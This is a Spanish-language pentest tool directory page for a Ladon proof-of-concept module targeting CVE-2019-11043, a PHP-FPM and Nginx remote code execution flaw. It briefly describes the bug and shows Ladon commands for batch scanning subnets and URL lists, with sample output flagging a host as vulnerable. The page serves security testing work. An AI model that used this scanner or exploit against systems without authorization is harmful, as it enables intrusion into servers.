Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-11043 — Ladon POC Módulo CVE-2019-11043 (PHP-FPM + Ngnix) | Kitploit
Herramientas/GitHubGitHub/k8gege/cve-2019-11043
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubk8gege/cve-2019-11043

CVE-2019-11043

Ladon POC Módulo CVE-2019-11043 (PHP-FPM + Ngnix)

Ver Repositorio
1613hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Ladon POC Moudle CVE-2019-11043 (PHP-FPM + Ngnix)

Introducción a la vulnerabilidad

Vulnerabilidad de ejecución remota de código en PHP-FPM (CVE-2019-11043)

En el Real World CTF organizado por Chaitin Technology, el investigador de seguridad extranjero Andrew Danau, al resolver un desafío CTF, descubrió que al enviar el símbolo %0a a la URL del servidor objetivo, el servicio devolvía una respuesta anómala, lo que sugería la existencia de una vulnerabilidad.

Con configuraciones erróneas de Nginx, mediante paquetes maliciosamente construidos, se puede lograr que PHP-FPM ejecute código arbitrario.

Ejemplo

Colóquelo en el mismo directorio que Ladon.exe para realizar la detección por lotes en el segmento C o en url.txt

root@kitploit:~
Ladon CVE-2019-11043_Poc.ini 批量URL检测(根目录下放url.txt)
Ladon 192.168.1.37/24 CVE-2019-11043_Poc.ini 批量检测C段主机是否存在该漏洞
Ladon http://192.168.1.37:8080/index.php CVE-2019-11043_Poc.ini 指定URL
Ladon 5.5
By K8gege
Call AnyExe/Command
http://192.168.1.37:8080/index.php
load F:\Python279\python.exe
ISVUL: CVE-2019-11043 http://192.168.1.37:8080/index.php

### Descarga Ladon: https://github.com/k8gege/Ladon
Descargar herramienta